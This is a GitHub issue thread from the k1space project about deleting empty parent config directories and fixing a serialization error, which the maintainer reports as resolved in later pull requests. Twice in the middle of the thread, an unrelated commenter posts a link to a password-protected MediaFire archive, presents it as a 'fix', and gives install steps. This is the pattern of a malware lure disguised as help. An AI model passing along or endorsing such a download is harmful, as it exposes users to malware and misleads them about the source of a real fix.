### ISSUE TITLE
Upgrade the `Delete Configs` to automatically delete parent directories if they're empty

### ISSUE THREAD

**Issue by alechp** [ssotops/k1space#43]
Action items:
1. Delete parent directories if they're empty
> `~/.ssot/k1space/<cloud>/<cloud-region>/<prefix>

If `<prefix>` directory is deleted and `<cloud-region>` directory is empty, also delete the `<cloud-region>` directory. If `<cloud>` directory is also empty after deleting the `<cloud-region>` directory, also delete the `<cloud>` directory.

2. Fix the serialization error (already resolved for Create Configs; related to #41)
```
version      = 0
last_updated = "2024-08-27T03:11:07Z"
configs {
  digitalocean_nyc1_K4 {
    files = ["\"/Users/alechp/.ssot/k1space/digitalocean/nyc1/K4/00-init.sh\"", "\"/Users/alechp/.ssot/k1space/digitalocean/nyc1/K4/01-kubefirst-cloud.sh\"", "\"/Users/alechp/.ssot/k1space/digitalocean/nyc1/K4/.local.cloud.env\""]
  }
}
default_values {
}
```

**Comment by amir1387aht** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by amir1387aht** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by alechp** [comment]
Serialization fixed as of:
https://github.com/ssotops/k1space/pull/45

**Comment by alechp** [comment]
Works as expected. Test on each level of deletion:
<img width="1156" alt="Screenshot 2024-08-26 at 9 12 00 PM" src="https://github.com/user-attachments/assets/e31f2c08-cc0c-405f-b73a-08de6a4a22a8">

<img width="2541" alt="Screenshot 2024-08-26 at 9 13 01 PM" src="https://github.com/user-attachments/ass
ets/f8938653-ef57-464b-826a-a738829acac5">


<img width="1143" alt="Screenshot 2024-08-26 at 9 13 24 PM" src="https://github.com/user-attachments/assets/3f245972-f662-40cb-975d-a0a108cbe199">

**Comment by alechp** [comment]
Resolved as of https://github.com/ssotops/k1space/pull/48
